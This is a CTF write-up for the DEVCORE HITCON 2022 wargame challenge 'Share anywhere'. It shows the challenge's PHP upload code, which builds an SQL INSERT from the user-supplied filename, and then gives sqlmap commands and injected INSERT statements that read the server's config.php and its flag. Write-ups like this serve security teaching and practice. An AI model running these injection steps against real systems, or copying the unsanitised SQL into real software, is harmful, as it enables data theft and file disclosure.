--- title: 'DEVCORE HITCON 2022 Wargame ' disqus: hackmd --- DEVCORE HITCON 2022 WargameShare anywhere (未完) === ## Table of Contents [TOC] ## Topic HITCON 2022 x DEVCORE Wargame https://github.com/DEVCORE-Wargame/HITCON-2022 ●Edit /share-anywhere/src/upload.php ```php= if (isset($_FILES['file']) && is_uploaded_file($_FILES['file']['tmp_name'])) { upload($_FILES['file']['name'], $_FILES['file']['tmp_name']); } ``` ●LAB: http://chw.com:8989/  ## Solution ### 1. Attempt ●Create test.php  #### 1.1 Upload method 1 ●curl --upload-file ./test.php http://chw.com:8989/  > Response: http://chw.com:8989/download.php?id=3C8B6421-AFF9-4770-AB43-8000F77275A5 #### 1.2 Upload method 2 ●curl -F 'file=@./test.php' http://chw.com:8989/upload.php  > Response: http://chw.com:8989/download.php?id=9E015401-43EF-4D40-9BB9-2124FC494EA3 #### 1.3 Download example with curl ●curl -O -J 'http://chw.com:8989/download.php?id=9E015401-43EF-4D40-9BB9-2124FC494EA3'  #### 1.4 Download example with wget ●wget --content-disposition 'http://chw.com:8989/download.php?id=3C8B6421-AFF9-4770-AB43-8000F77275A5'  > Response: ‘test.php.2’ saved #### 1.5 Check your file ●cat test.php.2  #### 1.6 Or if filename wasn't provided when uploading ●cat 9E015401-43EF-4D40-9BB9-2124FC494EA3.bin  ### 2. 白箱可以找到 flag 存在 config.php config.php ```php= <?php require_once('database.php'); require_once('functions.php'); if ($_SERVER['REQUEST_METHOD'] == 'PUT') { $path = parse_url($_SERVER['REQUEST_URI'])['path']; $basename = basename($path); if (empty($basename)) { $basename = guid().'.bin'; } upload($basename, 'php://input'); } if (isset($_FILES['file']) && is_uploaded_file($_FILES['file']['tmp_name'])) { upload($_FILES['file']['name'], $_FILES['file']['tmp_name']); } ################################################## function upload($filename, $upload_filepath) { $physical_path = '/uploads/'.guid(); copy($upload_filepath, $physical_path); $guid = guid(); if (empty($filename)) { $filename = $guid.'.bin'; } ################################################## $pdo = get_pdo(); $sql = "INSERT INTO files (guid, physical_path, filename) VALUES ('$guid', '$physical_path', '$filename')";** $result = $pdo->exec($sql); if ($result == 1) { $protocol = ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') || $_SERVER['SERVER_PORT'] == 443 || $_SERVER['HTTP_X_FORWARDED_PORT'] == 443) ? 'https' : 'http'; echo "$protocol://${_SERVER['HTTP_HOST']}/download.php?id=$guid"; } else { echo 'Error'; } exit(); } ``` ### 3 Sqlmap Tools #### [SQLmap 介紹: 開源的滲透測試工具](https://feifei.tw/security-tool-sqlmap/#:~:text=SQLmap%20%E6%98%AF%E4%B8%80%E5%80%8B%E9%96%8B%E6%BA%90%E7%9A%84,%E4%BD%9C%E6%A5%AD%E7%B3%BB%E7%B5%B1%E4%B8%8A%E5%9F%B7%E8%A1%8C%E5%91%BD%E4%BB%A4%E3%80%82) #### 3.1 List All Databases > sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" --dbs --batch  #### 3.2 Enumerate DBMS database > sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" -D "web" --tables  #### 3.3 Enumerate DBMS database table entries > sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" -T "files" --dump  #### 3.4 Using --sql-shell to INSERT specific path > sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" --sql-shell > sql-shell> INSERT INTO files (guid, physical_path, filename) VALUES ('42','/var/www/html/upload.php','upload.php'); #### 3.5 [Attempt] GET upload.php >curl http://chw.com:8989/download.php?id=42  **success !!!** #### 3.6 Using --sql-shell to INSERT config.php path > sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" --sql-shell > sql-shell> INSERT INTO files (guid, physical_path, filename) VALUES ('44','/var/www/html/config.php','config.php'); #### 3.7 GET config.php >curl http://chw.com:8989/download.php?id=44  ### 4. Get FLAG {waku_waku_y0u_f0und_m3!} ###### tags: `CTF` `Web` `Sqlmap` `SQL-Injection`